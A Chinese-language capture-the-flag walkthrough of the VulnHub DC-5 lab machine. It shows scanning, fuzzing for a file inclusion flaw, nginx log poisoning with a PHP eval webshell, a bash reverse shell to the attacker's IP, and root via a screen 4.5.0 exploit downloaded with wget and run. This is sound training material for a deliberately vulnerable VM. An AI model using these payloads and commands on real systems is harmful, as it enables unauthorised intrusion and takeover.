一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.15）

靶机：DC5（10.0.2.58）

目标：获取靶机root权限和flag

靶机下载地址：https://download.vulnhub.com/dc/DC-5.zip

二、信息收集

使用nmap主机发现靶机ip：10.0.2.58

使用nmap端口扫描发现靶机开放端口：80、111、40315

nmap -A 10.0.2.58 -p 1-65535

打开网站未发现可利用的功能点，查看源码也没有发现隐藏信息

使用gobuster和dirsearch工具爆破目录

gobuster dir -u http://10.0.2.58/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.58

网站没有什么可利用的功能点，可以尝试对每一个爆破出来的php文件进行模糊性测试，看看也没有LFI。

发现thankyou.php文件存在文件包含漏洞

wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://10.0.2.58/thankyou.php?FUZZ=/etc/passwd

三、漏洞利用

根据nmap的扫描结果，靶机使用nginx搭建网站，可以尝试包含nginx的配置文件。

http://10.0.2.58/thankyou.php?file=/etc/nginx/nginx.conf

配置文件中获得了nginx错误日志的路径和访问日志路径

access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

直接包含nginx错误日志和访问日志，看看

发现错误日志包含成功，访问日志包含失败。那么我们可以利用错误日志来构造合法的php代码，从而利用包含漏洞

构造错误请求，写入错误日志，注意直接使用浏览器写入<和>会被url编码，使用蚁剑连接失败，使用burpsuite写入连接成功

http://10.0.2.58/thankyou.php?file=<?php @eval($_POST['pass']);?>

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

执行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件，发现存在可以文件/bin/screen-4.5.0

使用searchsploit搜索screen v4.5.0的历史漏洞，发现存在提权漏洞

searchsploit screen 4.5.0       

将exp下载下来，通过web服务上传到靶机，执行进行提权

cd /tmp
wget http://10.0.2.15/41154.sh
chmod +x 41154.sh
./41154.sh

获取flag